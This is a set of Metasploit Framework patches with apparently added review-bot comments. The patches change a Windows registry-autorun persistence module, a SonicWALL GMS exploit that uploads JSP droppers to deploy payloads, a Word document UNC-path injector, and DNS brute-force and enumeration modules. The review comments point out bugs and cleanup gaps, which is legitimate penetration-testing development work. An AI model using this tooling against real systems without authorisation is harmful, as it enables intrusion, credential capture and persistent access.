16a0ab19337e92716e23c86f2a13c521370bf7ab Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 18:37:11 -0600 Subject: [PATCH 313/421] Fix comment link and some whitespace --- lib/msf/core/post/file.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
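Review bot: The cleanup resource file built in `@clean_up_rc` only ever receives `rm` and `kill` lines; `write_to_reg` creates the `CurrentVersion\Run` value but records nothing to undo it. After the generated RC file is run, the autorun value remains and points at a deleted file, which is a leftover an assessment should not leave behind and one defenders will later find with no explanation. `write_to_reg` should append the matching removal after a successful `registry_setvaldata`, e.g. `@clean_up_rc << "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v #{nam}\n"`. Note also that `log_file` builds its timestamp with `"%Y%m%d.%M%S"`, which omits the hour.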
diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index db841aa46da3..47a0677c1c71 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -274,7 +274,7 @@ def append_file(file_name, data) end # - # Read a local file +local+ and write it as +remote+ on the remote file + # Read a local file +local+ and write it as +remote+ on the remote file # system # def upload_file(remote, local) @@ -304,7 +304,7 @@ def rm_f(*remote_files) # def rename_file(new_file, old_file) #TODO: this is not ideal as the file contents are sent to meterp server and back to the client - write_file(new_file, read_file(old_file)) + write_file(new_file, read_file(old_file)) rm_f(old_file) end alias :move_file :rename_file @@ -315,7 +315,7 @@ def rename_file(new_file, old_file) # Meterpreter-specific file read. Returns contents of remote file # +file_name+ as a String or nil if there was an error # - # You should never call this method directly. Instead, call #read_file + # You should never call this method directly. Instead, call {#read_file} # which will call this if it is appropriate for the given session. # def _read_file_meterpreter(file_name) From c131b7ef0e8953ca67e91f0460e0b3885a0b1b52 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 7 Feb 2013 21:06:05 -0400 Subject: [PATCH 314/421] Added exception handing and return checking as requested by Sinn3r --- modules/exploits/windows/local/persistence.rb | 92 ++++++++++++++----- 1 file changed, 67 insertions(+), 25 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 336c8678b6f9..942cd8f9df89 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb 
@@ -50,7 +50,7 @@ def initialize(info={}) [ OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]), OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), - OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']), + OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), ], self.class) @@ -72,19 +72,38 @@ def exploit if rexe.nil? script = create_script(delay, template_pe) script_on_target = write_script_to_target(script,rexename) + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return + end else alt_pay_exe = get_custom_exe script_on_target = write_exe_to_target(alt_pay_exe, rexename) + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return + end end # Initial execution of script - target_exec(script_on_target) + if target_exec(script_on_target) == nil + # Exit if we where not able to run the payload. + return + end case datastore['STARTUP'] when /USER/i - write_to_reg("HKCU", script_on_target, reg_val) + regwrite = write_to_reg("HKCU", script_on_target, reg_val) + # if we could not write the entry in the registy we exit the module. + if not regwrite + return + end when /SYSTEM/i - write_to_reg("HKLM", script_on_target, reg_val) + regwrite = write_to_reg("HKLM", script_on_target, reg_val) + # if we could not write the entry in the registy we exit the module. + if not regwrite + return + end end clean_rc = log_file() 
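Review bot: Each new early `return` in `exploit` leaves before `file_local_write(clean_rc,@clean_up_rc)`, so when a later step fails the cleanup commands already collected are discarded. For example, if the file was written to `%TEMP%` and `target_exec` then fails, the `rm` line never reaches disk and there is no record of what to remove. Writing the RC file in an `ensure` block, or before each `return` when `@clean_up_rc` is non-empty, would keep that record. The two `script_on_target == nil` checks are identical and can become a single `return if script_on_target.nil?` after the `if`/`else`. `exploit` continues past the end of this hunk.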
@@ -146,37 +165,49 @@ def log_file(log_path = nil) #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") - if name.nil? + if name tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" end - fd = session.fs.file.new(tempvbs, "wb") - fd.write(vbs) - fd.close - print_good("Persistent Script written to #{tempvbs}") - @clean_up_rc << "rm #{tempvbs}\n" + begin + fd = session.fs.file.new(tempvbs, "wb") + fd.write(vbs) + fd.close + print_good("Persistent Script written to #{tempvbs}") + @clean_up_rc << "rm #{tempvbs}\n" + rescue + print_error("Could not write the payload on the target hosts.") + # return nil since we could not write the file on the target host. + tempvbs = nil + end return tempvbs end # Function to execute script on target and return the PID of the process #------------------------------------------------------------------------------- def target_exec(script_on_target) + execsuccess = true print_status("Executing script #{script_on_target}") - if datastore['EXE::Custom'].nil? - proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true}) - else - proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) + # error handling for process.execute() can throw a RequestError in send_request. + begin + if datastore['EXE::Custom'].nil? 
+ session.shell_command_token(script_on_target) + else + session.shell_command_token("cscript \"#{script_on_target}\"") + end + rescue + print_error("Failed to execute payload on target host.") + execsuccess = nil end - - print_good("Agent executed with PID #{proc.pid}") - @clean_up_rc << "kill #{proc.pid}\n" - return proc.pid + return execsuccess end # Function to install payload in to the registry HKLM or HKCU #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) + # Lets start to assume we had success. + write_success = true if registry_value.nil? nam = Rex::Text.rand_text_alpha(rand(8)+8) else @@ -186,10 +217,16 @@ def write_to_reg(key,script_on_target, registry_value) print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") if(key) - registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") - print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + set_return = registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") + if set_return + print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + else + print_error("Failed to make entry in the registry for persistence.") + write_success = false + end else print_error("Error: failed to open the registry key for writing") + write_success = false end end 
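Review bot: The condition in `write_script_to_target` was inverted when `if name.nil?` became `if name`. A supplied name is now ignored in favour of a random one, and a nil name reaches `tempdir + "\\" + name + ".vbs"`, which raises a TypeError outside the new `begin`/`rescue`. It should read `if name.nil?` as before. In the same hunk `target_exec` no longer appends `kill #{proc.pid}` to `@clean_up_rc`, so the cleanup file stops recording the process it started; if the PID is no longer available, a comment should say so.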
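Review bot: `write_to_reg` sets `write_success` but never returns it, because the method's last expression is the `if(key)` statement. On the success path the caller receives the return value of `print_good`, presumably nil. `exploit` now tests `if not regwrite` and returns, which would skip writing the cleanup RC file and the `report_note` even though the Run value was created. End the method with `write_success` as its final line. The `if(key)` test itself can never be false for the literal `"HKCU"` and `"HKLM"` arguments passed in this file.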
@@ -204,11 +241,16 @@ def write_exe_to_target(exe_raw, rexename) tempdir = session.fs.file.expand_path("%TEMP%") tempexe = tempdir + "\\" + exe_name + ".exe" - fd = session.fs.file.new(tempexe, "wb") - fd.write(exe_raw) - fd.close - print_good("Persistent Script written to #{tempexe}") - @clean_up_rc << "rm #{tempexe}\n" + begin + fd = session.fs.file.new(tempexe, "wb") + fd.write(exe_raw) + fd.close + print_good("Persistent executable written to #{tempexe}") + @clean_up_rc << "rm #{tempexe}\n" + rescue + print_error("Failed to write the payload on the target.") + tempexe = nil + end return tempexe end end \ No newline at end of file From 0ad548a777471ead59e604f07af79d4e5d48dfe8 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 19:16:44 -0600 Subject: [PATCH 315/421] I expect people to know what a share is. --- modules/exploits/windows/smb/smb_relay.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index c66058140402..bbbcb2c34cbc 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -95,7 +95,7 @@ module is not able to clean up after itself. The service and payload register_options( [ OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]), - OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) + OptString.new('SHARE', [ true, "The share to connect to", 'ADMIN$' ]) ], self.class ) end From 1f9a09d5dde2aba2135e0d86958d2ddb048008be Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 21:09:32 -0600 Subject: [PATCH 316/421] Add a method to upload and exec in one step --- .../multi/http/sonicwall_gms_upload.rb | 51 ++++++++++--------- 1 file changed, 27 insertions(+), 24 deletions(-) 
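Review bot: The bare `rescue` in `write_exe_to_target` discards the exception, so the only output is "Failed to write the payload on the target." with no cause, and `fd` stays open if `fd.write` raises. Use `rescue => e`, include `#{e.class}: #{e}` in the `print_error`, and close the handle in an `ensure` (`fd.close if fd`). Because the `rm` line is added to `@clean_up_rc` only after `fd.close`, a write that fails part-way can leave a partial file that the cleanup record does not mention; appending the line right after the file is opened avoids that. `write_script_to_target` in this commit has the same pattern.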
diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 27f928b9bd4d..4a78d8149700 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,9 +5,6 @@ # http://metasploit.com/ ## -load 'lib/msf/core/payload/java.rb' -load 'lib/msf/core/encoded_payload.rb' -load 'lib/msf/util/exe.rb' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -61,7 +58,7 @@ def initialize(info = {}) 'Platform' => 'win' } ], - [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + [ 'SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)', { 'Arch' => ARCH_X86, 'Platform' => 'linux' @@ -141,13 +138,25 @@ def upload_file(location, filename, contents) end end - def check - @peer = "#{rhost}:#{rport}" + def upload_and_run_jsp(filename, contents) + upload_file(path_join(install_path,"webapps","appliance"), filename, contents) + send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, "appliance", filename), + 'method' => 'GET' + }) + end + def check if install_path.nil? return Exploit::CheckCode::Safe end + if install_path.include?("\\") + print_status("Target looks like Windows") + else + print_status("Target looks like Linux") + end return Exploit::CheckCode::Vulnerable end 
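Review bot: `upload_and_run_jsp` ignores the value `upload_file` returns and always issues the follow-up GET, and the result of that `send_request_cgi` is discarded as well. A failed upload therefore shows up only as a missing session, with nothing in the output to say which step failed. Return early with a `print_error` when `upload_file` does not return true, and check the response of the GET before reporting success.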
@@ -171,26 +180,23 @@ def exploit end def exploit_java + print_status("#{@peer} - Uploading WAR file") jsp_name = "index" - #app_base = rand_text_alphanumeric(4+rand(32-4)) - app_base = "foo" + app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base, :jsp_name => jsp_name, }).to_s - File.open("foo.war", "wb") { |fd| fd.write(war) } war_filename = path_join(install_path, "webapps","#{app_base}.war") + register_files_for_cleanup(war_filename) dropper = jsp_drop_bin(war, war_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) - send_request_cgi( - { - 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), - 'method' => 'GET' - }) + upload_and_run_jsp(dropper_filename, dropper) + + # Now make a request to trigger the newly deployed war send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -198,24 +204,20 @@ def exploit_java }) end - def exploit_native - dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + print_status("#{@peer} - Uploading executable file") exe = payload.encoded_exe exe_filename = Rex::Text.rand_text_alpha(8) if target['Platform'] == "win" exe << ".exe" end - dropper = jsp_drop_and_execute(exe, "#{install_path}#{exe_filename}") + register_files_for_cleanup(exe_filename) - upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) - send_request_cgi( - { - 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), - 'method' => 'GET' - }) + dropper = jsp_drop_and_execute(exe, path_join(install_path, exe_filename)) + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + upload_and_run_jsp(dropper_filename, dropper) end def path_join(*paths) 
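Review bot: In `exploit_native`, `register_files_for_cleanup(exe_filename)` registers the bare file name, while the dropper writes to `path_join(install_path, exe_filename)`. The cleanup step is therefore pointed at a different path and the executable would be left on the host. Register the same joined path that is passed to `jsp_drop_and_execute`. Also, `exe << ".exe"` appends the suffix to the payload bytes in `exe` rather than to `exe_filename`, which looks unintended.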
@@ -230,6 +232,7 @@ def path_join(*paths) path end + # This should probably go in a mixin def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| From e535a3e93fd85052814c882b8bd7659365927b43 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 21:10:27 -0600 Subject: [PATCH 317/421] Guard against running broken method on non-windows This just puts a bandaid around the issue and makes it so FileDropper doesn't completely break java and posix meterpreter sessions. [SeeRM #7721] --- lib/msf/core/exploit/file_dropper.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 2a17254de7d8..6298354b6795 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -22,7 +22,9 @@ def on_new_session(session) # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the # read-only flag with a command. - session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + if session.platform =~ /win/ + session.shell_command_token(%Q|attrib.exe -r #{win_file}|) + end session.fs.file.rm(file) print_good("Deleted #{file}") true From 66f0bddb54e500669dfa5111b165e77e817d18b8 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Fri, 8 Feb 2013 12:46:13 +0100 Subject: [PATCH 318/421] fixed error check, a comment, manipulate_file all in memory now --- modules/auxiliary/docx/word_unc_injector.rb | 86 +++++++-------------- 1 file changed, 26 insertions(+), 60 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index c234f3dd8e02..3ee9bb93dab3 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb 
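Review bot: In the file_dropper.rb hunk the rewritten command drops the double quotes around the path: `attrib.exe -r "#{win_file}"` became `attrib.exe -r #{win_file}`. A path containing spaces is then split into several arguments and the read-only flag is not cleared on the intended file. Keep the quoting, `session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)`. The guard `session.platform =~ /win/` is also unanchored and would match a platform string such as `darwin`, if a session can report one, so a more specific pattern is safer. `on_new_session` begins before this hunk.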
@@ -81,33 +81,29 @@ def make_new_file #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulate_file - #where do we unpack our source files - tmp_dir = "#{Dir.tmpdir}/unc#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - - if not File.exists?(datastore['SOURCE']) - print_error("File #{datastore['SOURCE']} does not exist.") - return nil - end if not File.stat(datastore['SOURCE']).readable? print_error("Not enough rights to read the file. Aborting.") return nil end - #lets extract our docx - if unzip_docx(tmp_dir).nil? + #lets extract our docx and store it in memory + zip_data = unzip_docx + + #file to check for reference file we need + file_content = zip_data["word/settings.xml"] + if file_content.nil? + print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.") return nil end - file_content = File.read("#{tmp_dir}/word/settings.xml") - - #if we can find the reference, we don't need to add it and can just inject our unc file. + #if we can find the reference to our inject file, we don't need to add it and can just inject our unc path. if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") - update_docx_file(tmp_dir,"word/_rels/settings.xml.rels", @rels_file_data) + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data # lets zip the end result - zip_docx(tmp_dir) + zip_docx(zip_data) else #now insert the reference to the file that will enable our malicious entry insert_one = file_content.index("<w:defaultTabStop") 
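Review bot: `zip_data = unzip_docx` is used without a nil check, but `unzip_docx` returns nil when `Zip::ZipError` is rescued. An invalid SOURCE now fails with NoMethodError at `zip_data["word/settings.xml"]` instead of taking the clean `return nil` that the removed `if unzip_docx(tmp_dir).nil?` provided. Add `return nil if zip_data.nil?` directly after the call. The hunk also removes the `File.exists?` test while keeping `File.stat(datastore['SOURCE'])`, which raises when the file is missing. `manipulate_file` continues past the end of this hunk.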
@@ -125,76 +121,46 @@ def manipulate_file if insert_one.nil? && insert_two.nil? print_error("Cannot find insert point for reference into settings.xml") - FileUtils.rm_rf(tmp_dir) return nil end #update the files that contain the injection and reference - update_docx_file(tmp_dir, "word/settings.xml",file_content) - update_docx_file(tmp_dir, "word/_rels/settings.xml.rels", @rels_file_data) - + zip_data["word/settings.xml"] = file_content + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data #lets zip the file - zip_docx(tmp_dir) + zip_docx(zip_data) end - return 0 + return 0 end - #making the actual docx - def zip_docx(tmp_dir) + #making the actual docx from the hash + def zip_docx(zip_data) docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding files from #{tmp_dir}") - Dir["#{tmp_dir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(tmp_dir,''), File.read(file)) - end + zip_data.each_pair do |k,v| + docx.add_file(k,v) end - #add the otherwise skipped "hidden" file - file = "#{tmp_dir}/_rels/.rels" - docx.add_file(file.sub(tmp_dir,''), File.read(file)) file_create(docx.pack) - FileUtils.rm_rf(tmp_dir) end #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way - def unzip_docx(tmp_dir) - #create temoprary directory so we can do some error handling if needed. - begin - if File.directory?(tmp_dir) - FileUtils.rm_rf(tmp_dir) - end - FileUtils.mkdir_p(tmp_dir) - rescue - print_error("Error creating/deleting temporary directory #{tmp_dir}, check rights.") - return nil - end - #unzip the SOURCE document into the tmp_dir - vprint_status("Rubyzip sometimes corrupts the document, so we do it the hard way. 
Extracting #{datastore['SOURCE']}") + def unzip_docx + #Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::ZipFile + vprint_status("Extracting #{datastore['SOURCE']} into memory.") + #we read it all into memory + zip_data = Hash.new begin Zip::ZipFile.open(datastore['SOURCE']) do |filezip| filezip.each do |entry| - fpath = File.join(tmp_dir, entry.name) - FileUtils.mkdir_p(File.dirname(fpath)) - filezip.extract(entry, fpath) + zip_data[entry.name] = filezip.read(entry) end end rescue Zip::ZipError => e print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.") return nil end - return 0 + return zip_data end - #used for updating the files inside the docx from a string - def update_docx_file(tmp_dir,file_string, content) - archive = File.join(tmp_dir, file_string) - vprint_status("We need to look for: #{archive}") - if File.exists?(archive) - vprint_status("Deleting original file #{archive}") - File.delete(archive) - end - File.open(archive, 'wb+') { |f| f.write(content) } - end def run #we need this in make_new_file and manipulate_file @@ -206,7 +172,7 @@ def run if "#{datastore['SOURCE']}" == "" #make an empty file - print_status("Creating empty document") + print_status("Creating empty document that points to #{datastore['LHOST']}.") make_new_file else #extract the word/settings.xml and edit in the reference we need From 2186db529573bbf05e2bb5ed61cd2fa9e4a385b0 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:48:32 -0400 Subject: [PATCH 319/421] Split of DNS Name Brutforce from enum_dns --- modules/auxiliary/gather/dns_bruteforce.rb | 137 +++++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/auxiliary/gather/dns_bruteforce.rb diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb new file mode 100644 index 000000000000..a6e72080a6a9 
--- /dev/null
+++ b/modules/auxiliary/gather/dns_bruteforce.rb
@@ -0,0 +1,137 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Description' => %q{ + This module uses a dictionary to perform a bruteforce on Hostnames and Subdomains + available under a given domain. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", + File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ false, "Number of threads", 1]), + ], self.class) + end + + def run + print_status("Enumerating #{datastore['DOMAIN']}") + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + wildcard(datastore['DOMAIN']) + switchdns() if not datastore['NS'].nil? 
+ dnsbrt(datastore['DOMAIN']) + end + + #--------------------------------------------------------------------------------- + def wildcard(target) + rendsub = rand(10000).to_s + query = @res.query("#{rendsub}.#{target}", "A") + if query.answer.length != 0 + print_status("This Domain has Wildcards Enabled!!") + query.answer.each do |rr| + print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + end + return true + else + return false + end + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end + + def dnsbrt(domain) + print_status("Performing bruteforce against #{domain}") + queue = [] + File.open(datastore['WORDLIST'], 'rb').each_line do |testd| + queue << testd.strip + end + while(not queue.empty?) 
+ tl = [] + 1.upto(datastore['THREADS']) do + tl << framework.threads.spawn("Module(#{self.refname})-#{domain}", false, queue.shift) do |testf| + Thread.current.kill if not testf + vprint_status("Testing #{testf}.#{domain}") + get_ip("#{testf}.#{domain}").each do |i| + print_good("#{i[:host]} #{i[:address]}") + report_host( + :host => i[:address].to_s, + :name => i[:host].gsub(/\.$/,'') + ) + end + end + end + if(tl.length == 0) + break + end + tl.first.join + tl.delete_if { |t| not t.alive? } + end + end +end From 906585798d0f3ceebab2877d11149581f8db5a78 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:49:19 -0400 Subject: [PATCH 320/421] Split of DNS General Info from enum_dns --- modules/auxiliary/gather/dns_info.rb | 218 +++++++++++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/auxiliary/gather/dns_info.rb diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb new file mode 100644 index 000000000000..bbf772cf5b32 --- /dev/null +++ b/modules/auxiliary/gather/dns_info.rb 
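Review bot: The A-record branch of `get_ip` sets `record[:type] = "AAAA"`, so every IPv4 answer is labelled as IPv6; it should read `record[:type] = "A"`, and the copy of `get_ip` added in dns_srv.rb carries the same label. `run` also discards the boolean returned by `wildcard(...)`, so on a wildcard domain every wordlist entry resolves and `report_host` records a host for each one; at minimum keep the result and warn or stop before `dnsbrt` writes to the database. In `dnsbrt`, `File.open(datastore['WORDLIST'], 'rb').each_line` never closes the handle; the block form `File.open(datastore['WORDLIST'], 'rb') { |f| f.each_line { |testd| queue << testd.strip } }` does.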
@@ -0,0 +1,218 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Base Information', + 'Description' => %q{ + This module enumerates basic DNS information for a given Domain. Information + enumerated is A, AAAA, NS and MX Records for the given domain. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + ], self.class) + end + + def run + print_status("Enumerating #{datastore['DOMAIN']}") + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + wildcard(datastore['DOMAIN']) + switchdns() if not datastore['NS'].nil? 
+ + # Get A and AAAA Records for the domain + get_ip(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address]) + end + + # Get Name Servers + get_ns(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + report_service( + :host => r[:address], + :name => "dns", + :port => 53, + :proto => "udp" + ) + end + + # Get SOA + get_soa(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + end + + #Get MX + get_mx(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + report_service( + :host => r[:address], + :name => "smtp", + :port => 25, + :proto => "tcp" + ) + end + + # Get TX + get_txt(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + end + end + + #--------------------------------------------------------------------------------- + def wildcard(target) + rendsub = rand(10000).to_s + query = @res.query("#{rendsub}.#{target}", "A") + if query.answer.length != 0 + print_status("This Domain has Wildcards Enabled!!") + query.answer.each do |rr| + print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + end + return true + else + return false + end + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + record = {} + record[:host] = host + record[:type] = "A" + record[:address] = rr.address.to_s + results << record + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + record = {} + record[:host] = host + 
record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_ns(target) + results = [] + query = @res.query(target, "NS") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def get_txt(target) + query = @res.query(target, "TXT") + if (query) + query.answer.each do |rr| + print_good("Text: #{rr.txt}, TXT") + end + end + end + + #--------------------------------------------------------------------------------- + def get_mx(target) + results = [] + query = @res.query(target, "MX") + if (query) + (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| + if Rex::Socket.dotted_ip?(rr.exchange) + record = {} + record[:host] = rr.exchange + record[:type] = "MX" + record[:address] = rr.exchange + results << record + else + get_ip(rr.exchange).each do |ip| + record = {} + 